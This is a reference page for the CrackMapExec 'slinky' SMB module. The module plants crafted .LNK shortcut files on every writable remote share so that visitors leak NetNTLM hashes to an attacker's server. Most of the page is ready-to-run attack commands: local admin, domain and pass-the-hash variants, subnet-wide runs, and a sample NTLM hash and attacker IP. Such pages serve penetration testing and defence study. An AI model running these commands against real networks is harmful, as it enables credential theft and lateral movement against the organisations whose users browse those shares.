CrackMapExec Slinky (smb)


This page contains detailed information about how to use the slinky CME module while using the smb protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.

Description

This module creates Windows shortcut (.LNK file) with specially crafted icon attribute on all remote writeable shares. The icon attribute points to an arbitrary UNC path - ideally the attacker's machine. Afterwards, anyone who visits the shared folder (with the .LNK file inside) will automatically try to authenticate against the specified SERVER (to load the icon) and send NetNTLM hash. The attacker can then capture the NetNTLM hash (e.g. by using Responder or the auxiliary/server/capture/smb Metasploit module) and crack it.

The slinky module is OPSEC unsafe which means that it may touch the disk and therefore can trigger an alarm.

Supported Protocols

  • smb

Module Source Code

Authors

Module Options

Here is a complete list of slinky module options:

# cme smb -M slinky --options
[*] slinky module options:

        SERVER        IP of the SMB server
        NAME          LNK file name
        CLEANUP       Cleanup (choices: True or False)

The SERVER and NAME options are required! Make sure to set them when using this module.

Module Usage

This is how to use the slinky module while using the smb protocol:

Syntax:
# cme smb <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M slinky -o SERVER=<host> -o NAME=<name>

Local admin:
# cme smb 10.0.5.1 -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u Administrator -p P@ss123 --local-auth -M slinky -o SERVER=10.0.6.11 -o NAME=test

Domain user:
# cme smb 10.0.5.1 -u bkpadmin -p P@ss123 -d target.corp -M slinky -o SERVER=10.0.6.11 -o NAME=test

CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:

# cme smb 10.0.5.1 -u Administrator -H 432b022dc22aa5afe884e986b8383ff2 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u bkpadmin -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M slinky -o SERVER=10.0.6.11 -o NAME=test
The slinky module can be also used against multiple hosts. Here's how to run it against multiple hosts:

# cme smb target_list.txt -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.0/24 -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1-100 -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test

References

Version

This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.